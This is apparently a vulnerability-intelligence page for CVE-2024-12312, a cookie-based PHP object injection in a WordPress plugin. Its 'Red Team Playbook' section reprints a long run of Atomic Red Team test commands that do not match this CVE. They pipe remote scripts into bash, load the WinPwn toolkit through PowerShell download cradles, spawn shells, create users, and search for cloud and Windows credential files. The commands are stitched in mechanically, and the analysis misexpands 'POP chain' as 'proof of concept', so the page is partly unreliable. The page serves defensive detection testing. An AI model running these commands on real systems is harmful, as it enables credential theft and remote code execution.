CVE-2024-12312
Overview
This vulnerability is a PHP Object Injection caused by unsafe deserialization of untrusted data within the Print Science Designer WordPress plugin. The flaw arises from the handling of the 'designer-saved-projects' cookie, which is deserialized without proper validation. The affected component is the saved-projects.php script responsible for processing this cookie in versions up to and including 1.3.152.
Vulnerability Description
The Print Science Designer plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.152 via deserialization of untrusted input through the 'designer-saved-projects' cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
Impact
An unauthenticated attacker can exploit this vulnerability remotely by sending a malicious 'designer-saved-projects' cookie, potentially leading to arbitrary file deletion, data disclosure, or remote code execution if a suitable POP chain exists via other installed plugins or themes. The attack requires no user interaction and no privileges (AV:N/AC:H/PR:N/UI:N), making it a high-severity threat with full confidentiality, integrity, and availability impact (C:H/I:H/A:H). This can result in data breaches, system compromise, and service disruption.
Solution
Users should upgrade the Print Science Designer plugin to version 1.3.153 or later, where the unsafe deserialization flaw has been addressed, as documented in the WordPress plugin repository changelog. Detailed patch information and code changes are available at https://plugins.trac.wordpress.org/browser/print-science-designer/tags/1.3.153/includes/saved-projects.php#L120. Administrators should verify plugin versions and apply updates promptly to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability within the Print Science Designer plugin for WordPress arises from improper handling of user input, specifically through the deserialization of untrusted data from the 'designer-saved-projects' cookie. This flaw allows for PHP Object Injection, a serious security issue that can be exploited by attackers to manipulate the underlying PHP environment. When an application deserializes data without adequate validation, it opens the door for malicious actors to craft specially formatted input that can lead to the instantiation of arbitrary PHP objects. Although the vulnerable software does not currently have a known "proof of concept" (POP) chain, the presence of such a chain through other plugins or themes could significantly increase the risk of exploitation.
Attack vectors for this vulnerability are particularly concerning due to the ability for unauthenticated users to exploit it. An attacker could craft a malicious cookie that, when processed by the vulnerable plugin, leads to the injection of a PHP object. This could open up various exploitation scenarios, such as file deletion, sensitive data retrieval, or even arbitrary code execution. The potential for exploitation is exacerbated in environments where additional plugins or themes may introduce their own vulnerabilities or provide a means for the attacker to escalate privileges. The ease of access for unauthenticated users makes this vulnerability particularly dangerous, as it does not require any prior authentication or user interaction to initiate an attack.
The real-world impact of this vulnerability can be profound, especially for organizations that rely on WordPress for their online presence. The risk extends beyond mere data loss; it encompasses reputational damage, regulatory fines, and loss of customer trust. For businesses that handle sensitive information, the potential for data breaches could lead to significant financial repercussions and legal liabilities. Moreover, the exploitation of this vulnerability could serve as a gateway for further attacks, potentially compromising entire systems and networks. The interconnected nature of modern web applications means that a single vulnerability can have cascading effects, leading to widespread disruption and damage.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating all plugins and themes to their latest versions is crucial, as this can help close known security gaps. Additionally, employing web application firewalls (WAFs) can provide an extra layer of defense by filtering out malicious requests before they reach the application. Code reviews and security audits should be conducted to identify any instances of insecure deserialization practices, particularly in custom code or third-party plugins. Furthermore, organizations should consider implementing strict input validation and sanitization measures to ensure that only trusted data is processed by the application.
In conclusion, the PHP Object Injection vulnerability in the Print Science Designer plugin for WordPress presents a significant threat to the security of web applications utilizing this software. The ability for unauthenticated attackers to exploit this flaw underscores the importance of maintaining robust security practices, including regular updates, thorough code reviews, and proactive monitoring. By understanding the technical details, potential attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to defend against such threats and protect their digital assets.
Recent CSURFACE threat intelligence indicates a measurable increase in the Exploit Prediction Scoring System (EPSS) for CVE-2024-12312, rising by over 30% to a current score placing it near the 93rd percentile. This shift reflects a growing likelihood of exploitation attempts targeting the Print Science Designer plugin’s PHP Object Injection vulnerability. Although no new proof-of-concept exploits or active exploitation campaigns have been detected by our sensors, the elevated EPSS score signals heightened attacker interest or improved exploitability conditions. For defenders, this escalation underscores the urgency of monitoring related attack vectors closely, as the vulnerability’s potential impact remains significant, especially in environments where additional plugins or themes may enable a viable POP chain. Consequently, the threat level should be considered elevated, with increased probability of exploitation in the near term, warranting sustained vigilance despite the absence of confirmed active exploitation.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-12312 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/8008b5e2-f3b4-492c-8e50-b673f725b2b1?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/print-science-designer/tags/1.3.152/includes/saved-projects.php#L120 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/print-science-designer/tags/1.3.153/includes/saved-projects.php#L120 |